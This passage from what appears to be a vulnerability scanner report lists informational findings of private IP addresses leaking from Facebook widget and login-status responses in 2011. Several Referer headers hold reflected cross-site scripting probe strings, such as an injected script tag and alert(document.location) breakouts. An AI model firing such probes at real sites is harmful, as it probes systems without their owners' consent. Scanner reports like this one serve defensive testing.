HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.54.181.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:35 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u261585_1\\\">\\u00
...[SNIP]...

14.16. http://www.facebook.com/ajax/connect/connect_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.65.32.38
X-Cnection: close
Date: Mon, 12 Sep 2011 12:53:23 GMT
Content-Length: 21297

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u200377_1\\\">\\u00
...[SNIP]...

14.17. http://www.facebook.com/ajax/connect/connect_widget.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=107566832624397&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.27.159.104
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:26 GMT
Content-Length: 20569

for (;;);{"__ar":1,"payload":null,"css":["6dq9y","XbHUZ","fGvhx"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv id=\\\"u170638_1\\\">\\u00
...[SNIP]...

14.18. http://www.facebook.com/connect.php/js/FB.Share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1200
Content-Type: application/x-javascript; charset=utf-8
ETag: "358664d9830976a45e88c22693bb3d9e"
Expires: Mon, 12 Sep 2011 13:07:57 GMT
X-FB-Server: 10.27.186.123
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:57 GMT
Content-Length: 6585

/*1315831677,169589371,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

14.19. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.173.48
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:52 GMT
Content-Length: 1224

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"onsugar.com","channel":"htt
...[SNIP]...

14.20. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111813962172064&app_id=111813962172064&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3c0a350b4%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d5778e%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffb648fa%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36bb0e308%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b8fd6614%26origin%3Dhttp%253A%252F%252Fwww.cargoh.com%252Ff1ed74bc74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bcbea18&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.187.106
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:40 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f36bb0e308&origin=http\u00253A\u00252F\u00252Fwww.cargoh.com\u00252Ff1ed74bc74&relation=parent&transport=postmessage&frame=f1bcbea18", "http:\/\/
...[SNIP]...

14.21. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28fb233459d5e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd8bd9ec27f3a%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d0e0b4e44b07e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a328c2899b9ec%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ca53577db050e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff3b426a203cc254%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a44c0e4b549f&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.156.43
X-Cnection: close
Date: Mon, 12 Sep 2011 13:02:30 GMT
Content-Length: 264

<script type="text/javascript">
parent.postMessage("cb=f1a328c2899b9ec&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff3b426a203cc254&relation=parent&transport=postmessage&frame=f2a44c0e4b
...[SNIP]...

14.22. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd667bad4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36fd7b1e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f5002a3%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33dd7c2b4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df146f8bdf4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.174.125
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f33dd7c2b4&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff2363acf9c&relation=parent&transport=postmessage&frame=f155d9a90c", "http:\
...[SNIP]...

14.23. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=315957732474&app_id=315957732474&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c86c08d%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdb32640c%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1dc1ed774%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f3d9814c%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1902adca%26origin%3Dhttp%253A%252F%252Fwww.digitaldollhouse.com%252Ff38d9f2644%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1a3027fa8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.digitaldollhouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.188.108
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:55 GMT
Content-Length: 261

<script type="text/javascript">
parent.postMessage("cb=f3f3d9814c&origin=http\u00253A\u00252F\u00252Fwww.digitaldollhouse.com\u00252Ff38d9f2644&relation=parent&transport=postmessage&frame=f1a3027fa8",
...[SNIP]...

14.24. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=167965409939320&href=http%3A%2F%2Fwww.facebook.com%2Fmtvuk&send=false&layout=button_count&width=100&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.237.115
X-Cnection: close
Date: Mon, 12 Sep 2011 12:50:13 GMT
Content-Length: 23285

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

14.25. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=167965409939320&href=http%3A%2F%2Fwww.facebook.com%2Fmtvuk&send=false&layout=button_count&width=100&show_faces=false&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.194.37
X-Cnection: close
Date: Mon, 12 Sep 2011 13:05:01 GMT
Content-Length: 23360

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

14.26. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.182.118
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:09 GMT
Content-Length: 13284

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.27. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.48
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:35 GMT
Content-Length: 12828

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.28. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=15713980389&width=300&connections=10&stream=false&header=false&height=255 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.173.114
X-Cnection: close
Date: Mon, 12 Sep 2011 12:48:55 GMT
Content-Length: 13110

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.29. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=9665781619&width=300&connections=10&stream=false&header=true&height=287 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.127.52
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:21 GMT
Content-Length: 13287

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...

14.30. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.120.55
X-Cnection: close
Date: Mon, 12 Sep 2011 12:58:29 GMT
Content-Length: 12885

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
